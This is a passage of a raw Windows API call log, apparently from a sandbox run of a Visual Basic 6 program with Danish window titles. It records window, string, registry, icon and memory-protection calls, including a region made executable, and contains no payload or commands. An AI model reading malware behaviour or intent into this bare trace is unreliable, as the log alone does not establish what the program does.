lParam=0x12fe38) returned 0x0 [0057.256] DefWindowProcA (hWnd=0x301fc, Msg=0x47, wParam=0x0, lParam=0x12fe38) returned 0x0 [0057.256] GetWindowThreadProcessId (in: hWnd=0x301fc, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb88 [0057.256] VirtualQuery (in: lpAddress=0x12fea8, lpBuffer=0x12fe8c, dwLength=0x1c | out: lpBuffer=0x12fe8c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.256] GetUserDefaultLCID () returned 0x409 [0057.256] IsValidCodePage (CodePage=0x3a4) returned 1 [0057.258] IsValidCodePage (CodePage=0x3b5) returned 1 [0057.258] IsValidCodePage (CodePage=0x3b6) returned 1 [0057.258] IsValidCodePage (CodePage=0x3a8) returned 1 [0057.260] GetUserDefaultLangID () returned 0x409 [0057.260] GetSystemDefaultLangID () returned 0x1d0409 [0057.261] GetSystemMetrics (nIndex=42) returned 0 [0057.261] IMalloc:Alloc (This=0x768366bc, cb=0xa8) returned 0x1dc280 [0057.261] IMalloc:GetSize (This=0x768366bc, pv=0x1dc280) returned 0xa8 [0057.261] IMalloc:Alloc (This=0x768366bc, cb=0xc) returned 0x1ce368 [0057.261] GetCurrentThreadId () returned 0xb88 [0057.261] IMalloc:Alloc (This=0x768366bc, cb=0x3c) returned 0x1d9090 [0057.261] IMalloc:Alloc (This=0x768366bc, cb=0x1c) returned 0x1d8758 [0057.335] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x12fe74 | out: phkResult=0x12fe74*=0x0) returned 0x2 [0057.335] IMalloc:Alloc (This=0x768366bc, cb=0x1c) returned 0x1d8780 [0057.335] GetCurrentThreadId () returned 0xb88 [0057.336] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0xb88) returned 0xa018f [0057.336] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x12fdcc | out: lpWndClass=0x12fdcc) returned 0 [0057.336] RegisterClassA (lpWndClass=0x12fdcc) returned 0x7ac1cd [0057.336] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x401e4 [0057.336] DefWindowProcA (hWnd=0x401e4, Msg=0x81, wParam=0x0, lParam=0x12fa04) returned 0x1 [0057.336] DefWindowProcA (hWnd=0x401e4, Msg=0x83, wParam=0x0, lParam=0x12fa44) returned 0x0 [0057.336] DefWindowProcA (hWnd=0x401e4, Msg=0x1, wParam=0x0, lParam=0x12fa04) returned 0x0 [0057.336] DefWindowProcA (hWnd=0x401e4, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0057.337] DefWindowProcA (hWnd=0x401e4, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0057.337] SetWindowLongA (hWnd=0x401e4, nIndex=0, dwNewLong=28713116) returned 0 [0057.337] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0057.337] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0057.337] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0057.337] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0057.337] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0057.337] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0057.337] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0057.337] CreateCompatibleDC (hdc=0x0) returned 0x2301092d [0057.337] GetCurrentObject (hdc=0x2301092d, type=0x7) returned 0x185000f [0057.337] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x301fc, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x401e6 [0057.337] DefWindowProcA (hWnd=0x401e6, Msg=0x81, wParam=0x0, lParam=0x12fa9c) returned 0x1 [0057.337] DefWindowProcA (hWnd=0x401e6, Msg=0x83, wParam=0x0, lParam=0x12fad4) returned 0x0 [0057.337] DefWindowProcA (hWnd=0x401e6, Msg=0x1, wParam=0x0, lParam=0x12fa9c) returned 0x0 [0057.337] DefWindowProcA (hWnd=0x401e6, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0057.337] DefWindowProcA (hWnd=0x401e6, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0057.337] DefWindowProcA (hWnd=0x301fc, Msg=0x210, wParam=0x1, lParam=0x401e6) returned 0x0 [0057.338] GetCurrentThreadId () returned 0xb88 [0057.338] GetCurrentThreadId () returned 0xb88 [0057.338] lstrlenA (lpString="VB") returned 2 [0057.338] lstrlenA (lpString="OptionButton") returned 12 [0057.339] lstrlenA (lpString="VB") returned 2 [0057.339] lstrlenA (lpString="Printer") returned 7 [0057.339] lstrlenA (lpString="VB") returned 2 [0057.339] lstrlenA (lpString="Form") returned 4 [0057.339] lstrlenA (lpString="VB") returned 2 [0057.339] lstrlenA (lpString="Screen") returned 6 [0057.339] lstrlenA (lpString="VB") returned 2 [0057.339] lstrlenA (lpString="Clipboard") returned 9 [0057.340] lstrlenA (lpString="VB") returned 2 [0057.340] lstrlenA (lpString="MDIForm") returned 7 [0057.340] lstrlenA (lpString="VB") returned 2 [0057.340] lstrlenA (lpString="App") returned 3 [0057.340] lstrlenA (lpString="VB") returned 2 [0057.340] lstrlenA (lpString="Image") returned 5 [0057.341] lstrlenA (lpString="VB") returned 2 [0057.341] lstrlenA (lpString="UserControl") returned 11 [0057.342] lstrlenA (lpString="VB") returned 2 [0057.342] lstrlenA (lpString="PropertyPage") returned 12 [0057.342] lstrcmpiA (lpString1="VB.MDIForm", lpString2="VB.PropertyPage") returned -1 [0057.342] lstrlenA (lpString="VB") returned 2 [0057.342] lstrlenA (lpString="UserDocument") returned 12 [0057.343] GetCurrentThreadId () returned 0xb88 [0057.343] GetCurrentThreadId () returned 0xb88 [0057.344] GetCurrentThreadId () returned 0xb88 [0057.344] GetCurrentThreadId () returned 0xb88 [0057.344] lstrlenA (lpString="VB") returned 2 [0057.344] lstrlenA (lpString="PictureBox") returned 10 [0057.344] lstrlenA (lpString="VB") returned 2 [0057.344] lstrlenA (lpString="Label") returned 5 [0057.345] lstrlenA (lpString="VB") returned 2 [0057.345] lstrlenA (lpString="TextBox") returned 7 [0057.345] lstrlenA (lpString="VB") returned 2 [0057.345] lstrlenA (lpString="Frame") returned 5 [0057.346] lstrlenA (lpString="VB") returned 2 [0057.346] lstrlenA (lpString="CommandButton") returned 13 [0057.346] lstrlenA (lpString="VB") returned 2 [0057.346] lstrlenA (lpString="CheckBox") returned 8 [0057.347] lstrlenA (lpString="VB") returned 2 [0057.347] lstrlenA (lpString="ComboBox") returned 8 [0057.347] lstrlenA (lpString="VB") returned 2 [0057.347] lstrlenA (lpString="ListBox") returned 7 [0057.347] lstrlenA (lpString="VB") returned 2 [0057.347] lstrlenA (lpString="HScrollBar") returned 10 [0057.347] lstrlenA (lpString="VB") returned 2 [0057.347] lstrlenA (lpString="VScrollBar") returned 10 [0057.348] lstrlenA (lpString="VB") returned 2 [0057.348] lstrlenA (lpString="Timer") returned 5 [0057.348] lstrlenA (lpString="VB") returned 2 [0057.348] lstrlenA (lpString="DriveListBox") returned 12 [0057.348] lstrlenA (lpString="VB") returned 2 [0057.348] lstrlenA (lpString="DirListBox") returned 10 [0057.348] lstrlenA (lpString="VB") returned 2 [0057.348] lstrlenA (lpString="FileListBox") returned 11 [0057.349] lstrlenA (lpString="VB") returned 2 [0057.349] lstrlenA (lpString="Menu") returned 4 [0057.349] lstrlenA (lpString="VB") returned 2 [0057.349] lstrlenA (lpString="Shape") returned 5 [0057.349] lstrlenA (lpString="VB") returned 2 [0057.349] lstrlenA (lpString="Line") returned 4 [0057.350] lstrlenA (lpString="VB") returned 2 [0057.350] lstrlenA (lpString="Data") returned 4 [0057.350] lstrlenA (lpString="VB") returned 2 [0057.350] lstrlenA (lpString="OLE") returned 3 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0x64) returned 0x1dc330 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0x64) returned 0x1dc3a0 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0xc) returned 0x1ce380 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0x40) returned 0x1dc428 [0057.351] IMalloc:GetSize (This=0x768366bc, pv=0x1dc428) returned 0x40 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0x20) returned 0x1d8910 [0057.351] GetCurrentThreadId () returned 0xb88 [0057.351] GetCurrentThreadId () returned 0xb88 [0057.351] IMalloc:Alloc (This=0x768366bc, cb=0x1c) returned 0x1d8938 [0057.351] VirtualProtect (in: lpAddress=0x390000, dwSize=0x6000, flNewProtect=0x4, lpflOldProtect=0x12fdf8 | out: lpflOldProtect=0x12fdf8*=0x20) returned 1 [0057.351] GetCurrentProcess () returned 0xffffffff [0057.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x390000, dwSize=0x6000) returned 1 [0057.351] VirtualAlloc (lpAddress=0x390000, dwSize=0x7000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.352] VirtualAlloc (lpAddress=0x390000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.352] VirtualAlloc (lpAddress=0x390000, dwSize=0x9000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.352] VirtualAlloc (lpAddress=0x390000, dwSize=0xa000, flAllocationType=0x1000, flProtect=0x4) returned 0x390000 [0057.352] VirtualProtect (in: lpAddress=0x390000, dwSize=0xa000, flNewProtect=0x20, lpflOldProtect=0x12fdf8 | out: lpflOldProtect=0x12fdf8*=0x4) returned 1 [0057.352] GetCurrentProcess () returned 0xffffffff [0057.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x390000, dwSize=0xa000) returned 1 [0057.352] GetCurrentThreadId () returned 0xb88 [0057.358] GetCurrentThreadId () returned 0xb88 [0057.358] SetWindowTextA (hWnd=0x301fc, lpString="Antroposofi") returned 1 [0057.358] DefWindowProcA (hWnd=0x301fc, Msg=0xc, wParam=0x0, lParam=0x12fd6c) returned 0x1 [0057.358] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x12fd54 | out: phkResult=0x12fd54*=0x0) returned 0x2 [0057.393] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0057.393] VirtualQuery (in: lpAddress=0x12f780, lpBuffer=0x12f764, dwLength=0x1c | out: lpBuffer=0x12f764*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0057.394] IMalloc:Alloc (This=0x768366bc, cb=0x40) returned 0x1dc470 [0057.394] IMalloc:GetSize (This=0x768366bc, pv=0x1dc470) returned 0x40 [0057.394] GetCurrentThreadId () returned 0xb88 [0057.394] GetCurrentThreadId () returned 0xb88 [0057.394] GetCurrentThreadId () returned 0xb88 [0057.399] GetVersionExA (in: lpVersionInformation=0x12f470*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x10100c9, dwMinorVersion=0x12f3c0, dwBuildNumber=0x9, dwPlatformId=0x12f938, szCSDVersion="íàövÛ©ù\x01þÿÿÿÓ]úvàZúvü") | out: lpVersionInformation=0x12f470*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0057.400] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0057.400] GetCurrentThreadId () returned 0xb88 [0057.400] GetCurrentThreadId () returned 0xb88 [0057.400] GetCurrentThreadId () returned 0xb88 [0057.400] SetWindowTextA (hWnd=0x301fc, lpString="Antroposofi") returned 1 [0057.400] DefWindowProcA (hWnd=0x301fc, Msg=0xc, wParam=0x0, lParam=0x1b733b0) returned 0x1 [0057.402] GetCurrentThreadId () returned 0xb88 [0057.402] GetCurrentThreadId () returned 0xb88 [0057.402] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x98 [0057.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x72992cd8, cbMultiByte=-1, lpWideCharStr=0x12f358, cchWideChar=14 | out: lpWideCharStr="MS Sans Serif") returned 14 [0057.402] OleCreateFontIndirect () returned 0x0 [0057.403] lstrlenA (lpString="Delstaterne") returned 11 [0057.405] OleLoadPictureEx () returned 0x0 [0057.433] lstrlenA (lpString="Delstaterne") returned 11 [0057.433] lstrlenA (lpString="ThunderRT6") returned 10 [0057.433] lstrcpyA (in: lpString1=0x12f36c, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0057.433] lstrlenA (lpString="ThunderRT6Form") returned 14 [0057.433] lstrcpynA (in: lpString1=0x12f37a, lpString2="DC", iMaxLength=116 | out: lpString1="DC") returned="DC" [0057.433] lstrlenA (lpString="ThunderRT6") returned 10 [0057.433] lstrcpyA (in: lpString1=0x12f300, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0057.433] GetClassInfoA (in: hInstance=0x72940000, lpClassName="ThunderRT6Form", lpWndClass=0x12f32c | out: lpWndClass=0x12f32c) returned 0 [0057.433] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0057.433] RegisterClassA (lpWndClass=0x12f32c) returned 0xcac1d0 [0057.433] lstrlenA (lpString="ThunderRT6") returned 10 [0057.433] lstrcpyA (in: lpString1=0x12f300, lpString2="ThunderRT6" | out: lpString1="ThunderRT6") returned="ThunderRT6" [0057.433] lstrlenA (lpString="ThunderRT6Form") returned 14 [0057.433] lstrcpynA (in: lpString1=0x12f30e, lpString2="DC", iMaxLength=29 | out: lpString1="DC") returned="DC" [0057.433] RegisterClassA (lpWndClass=0x12f32c) returned 0xc1d1 [0057.433] AdjustWindowRectEx (in: lpRect=0x12f42c, dwStyle=0x2000000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x12f42c) returned 1 [0057.434] CreateWindowExA (dwExStyle=0x0, lpClassName=0xc1d1, lpWindowName="Delstaterne", dwStyle=0x2000000, X=32, Y=269, nWidth=333, nHeight=11, hWndParent=0x301fc, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x601a8 [0057.434] DefWindowProcA (hWnd=0x601a8, Msg=0x81, wParam=0x0, lParam=0x12ef64) returned 0x1 [0057.434] SetWindowLongA (hWnd=0x601a8, nIndex=-16, dwNewLong=33554432) returned 113246208 [0057.436] DefWindowProcA (hWnd=0x601a8, Msg=0x7c, wParam=0xfffffff0, lParam=0x12ebd8) returned 0x0 [0057.436] DefWindowProcA (hWnd=0x601a8, Msg=0x7d, wParam=0xfffffff0, lParam=0x12ebd8) returned 0x0 [0057.436] DefWindowProcA (hWnd=0x601a8, Msg=0x83, wParam=0x0, lParam=0x12ef8c) returned 0x0 [0057.436] GetSystemMenu (hWnd=0x601a8, bRevert=0) returned 0x0 [0057.436] SetWindowContextHelpId (param_1=0x601a8, param_2=0xffffffff) returned 1 [0057.436] DefWindowProcA (hWnd=0x601a8, Msg=0x1, wParam=0x0, lParam=0x12ef48) returned 0x0 [0057.436] GetDC (hWnd=0x601a8) returned 0x2a0107b2 [0057.436] GetTextMetricsA (in: hdc=0x2a0107b2, lptm=0x12f318 | out: lptm=0x12f318) returned 1 [0057.436] SetBkMode (hdc=0x2a0107b2, mode=1) returned 2 [0057.436] OleTranslateColor () returned 0x0 [0057.436] SetBkColor (hdc=0x2a0107b2, color=0xf0f0f0) returned 0xffffff [0057.436] OleTranslateColor () returned 0x0 [0057.436] SetTextColor (hdc=0x2a0107b2, color=0x0) returned 0x0 [0057.436] OleTranslateColor () returned 0x0 [0057.436] CreatePen (iStyle=0, cWidth=1, color=0x0) returned 0x2430092c [0057.436] SelectObject (hdc=0x2a0107b2, h=0x2430092c) returned 0x1b00017 [0057.436] SelectObject (hdc=0x2a0107b2, h=0x1900011) [0057.437] SelectObject (hdc=0x2a0107b2, h=0x220a080f) returned 0x18a002e [0057.437] GetTextMetricsA (in: hdc=0x2a0107b2, lptm=0x12f10c | out: lptm=0x12f10c) returned 1 [0057.437] GetClientRect (in: hWnd=0x601a8, lpRect=0x12f4ac | out: lpRect=0x12f4ac) returned 1 [0057.437] MapWindowPoints (in: hWndFrom=0x601a8, hWndTo=0x0, lpPoints=0x12f4ac, cPoints=0x2 | out: lpPoints=0x12f4ac) returned 17629216 [0057.437] EqualRect (lprc1=0x12f4ac, lprc2=0x12f48c) returned 1 [0057.437] SetEvent (hEvent=0x98) returned 1 [0057.437] SendMessageA (hWnd=0x601a8, Msg=0x80, wParam=0x1, lParam=0x40183) returned 0x0 [0057.437] DefWindowProcA (hWnd=0x601a8, Msg=0x80, wParam=0x1, lParam=0x40183) returned 0x0 [0057.438] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x12f368 | out: ppstm=0x12f368*=0x1d8b18) returned 0x0 [0057.438] GetSystemMetrics (nIndex=49) returned 16 [0057.438] GetSystemMetrics (nIndex=50) returned 16 [0057.438] IStream:RemoteSeek (in: This=0x1d8b18, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0057.438] ISequentialStream:RemoteRead (in: This=0x1d8b18, pv=0x12f318, cb=0x6, pcbRead=0x0 | out: pv=0x12f318*=0x0, pcbRead=0x0) returned 0x0 [0057.438] ISequentialStream:RemoteRead (in: This=0x1d8b18, pv=0x12f2f0, cb=0x10, pcbRead=0x0 | out: pv=0x12f2f0*=0x18, pcbRead=0x0) returned 0x0 [0057.438] ISequentialStream:RemoteRead (in: This=0x1d8b18, pv=0x12f2f0, cb=0x10, pcbRead=0x0 | out: pv=0x12f2f0*=0x18, pcbRead=0x0) returned 0x0 [0057.438] IStream:RemoteSeek (in: This=0x1d8b18, dlibMove=0x26, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0057.438] GlobalLock (hMem=0x1ba000c) returned 0x1e1f50 [0057.438] ISequentialStream:RemoteRead (in: This=0x1d8b18, pv=0x1e1f50, cb=0x28, pcbRead=0x0 | out: pv=0x1e1f50*=0x28, pcbRead=0x0) returned 0x0 [0057.438] ISequentialStream:RemoteRead (in: This=0x1d8b18, pv=0x1e1f78, cb=0x6a0, pcbRead=0x0 | out: pv=0x1e1f78*=0xb, pcbRead=0x0) returned 0x0 [0057.438] GlobalUnlock (hMem=0x1ba000c) returned 0 [0057.438] GlobalLock (hMem=0x1ba000c) returned 0x1e1f50 [0057.438] GlobalSize (hMem=0x1ba000c) returned 0x6c8 [0057.438] GetDC (hWnd=0x0) returned 0x200107f3 [0057.438] CreateCompatibleBitmap (hdc=0x200107f3, cx=32, cy=32) returned 0x13050929 [0057.438] SelectObject (hdc=0x2301092d, h=0x13050929) returned 0x185000f [0057.438] StretchDIBits (hdc=0x2301092d, xDest=0, yDest=0, DestWidth=32, DestHeight=32, xSrc=0, ySrc=0, SrcWidth=24, SrcHeight=24, lpBits=0x1e2378, lpbmi=0x1e1f50, iUsage=0x0, rop=0xcc0020) returned 24 [0057.439] GetObjectA (in: h=0x13050929, c=24, pv=0x12f288 | out: pv=0x12f288) returned 24 [0057.439] GlobalLock (hMem=0x1ba001c) returned 0x1deec0 [0057.439] GetBitmapBits (in: hbit=0x13050929, cb=4096, lpvBits=0x1deec0 | out: lpvBits=0x1deec0) returned 4096 [0057.439] SelectObject (hdc=0x2301092d, h=0x185000f) returned 0x13050929 [0057.439] DeleteObject (ho=0x13050929) returned 1 [0057.439] CreateBitmap (nWidth=32, nHeight=32, nPlanes=0x1, nBitCount=0x1, lpBits=0x0) returned 0x14050929 [0057.439] SelectObject (hdc=0x2301092d, h=0x14050929) returned 0x185000f [0057.439] StretchDIBits (hdc=0x2301092d, xDest=0, yDest=0, DestWidth=32, DestHeight=32, xSrc=0, ySrc=0, SrcWidth=24, SrcHeight=24, lpBits=0x1e25b8, lpbmi=0x1e1f50, iUsage=0x0, rop=0xcc0020) returned 24 [0057.439] GetObjectA (in: h=0x14050929, c=24, pv=0x12f270 | out: pv=0x12f270) returned 24 [0057.439] GlobalLock (hMem=0x1ba0024) returned 0x1e2628 [0057.439] GetBitmapBits (in: hbit=0x14050929, cb=128, lpvBits=0x1e2628 | out: lpvBits=0x1e2628) returned 128 [0057.439] CreateIcon (hInstance=0x400000, nWidth=32, nHeight=32, cPlanes=0x1, cBitsPixel=0x20, lpbANDbits=0x1e2628, lpbXORbits=0x1deec0) returned 0x80175 [0057.439] GlobalUnlock (hMem=0x1ba001c) returned 0 [0057.439] GlobalUnlock (hMem=0x1ba0024) returned 0 [0057.439] SelectObject (hdc=0x2301092d, h=0x185000f) returned 0x14050929 [0057.439] DeleteObject (ho=0x14050929) returned 1 [0057.439] ReleaseDC (hWnd=0x0, hDC=0x200107f3) returned 1 [0057.439] GlobalUnlock (hMem=0x1ba000c) returned 0 [0057.439] SendMessageA (hWnd=0x601a8, Msg=0x80, wParam=0x0, lParam=0x80175) returned 0x0 [0057.439] DefWindowProcA (hWnd=0x601a8, Msg=0x80, wParam=0x0, lParam=0x80175) returned 0x0 [0057.439] IUnknown:Release (This=0x1d8b18) returned 0x0 [0057.440] IsIconic (hWnd=0x601a8) returned 0 [0057.440] IsZoomed (hWnd=0x601a8) returned 0 [0057.440] GetClientRect (in: hWnd=0x601a8, lpRect=0x12f4a0 | out: lpRect=0x12f4a0) returned 1 [0057.440] GetWindow (hWnd=0x601a8, uCmd=0x5) returned 0x0 [0057.440] GetCurrentThreadId () returned 0xb88 [0057.440] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.441] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.441] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.441] DefWindowProcA (hWnd=0x301fc, Msg=0x47, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.442] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.442] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.442] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.442] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.442] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.442] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.442] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.442] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.442] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.442] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.442] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.442] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.442] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.442] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.442] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.442] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.442] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.442] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.442] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.442] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.442] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.442] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.442] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.442] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.442] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.442] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.442] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.442] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.442] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.442] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.443] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.443] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.443] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.443] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.443] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.443] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.443] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.443] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.443] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.443] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.443] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.443] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.443] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.443] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.443] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.443] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.443] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.443] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.443] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.443] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.443] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.443] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.443] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.443] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.443] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.444] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.444] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.444] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.444] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.444] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.444] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.444] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.444] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.444] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.444] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.444] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.444] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.444] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.444] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.444] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.444] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.444] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.444] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.444] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.444] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.444] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.444] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.444] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.445] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.445] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.445] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.445] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.445] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.445] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.445] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.445] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.445] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.445] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.445] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.445] GetWindow 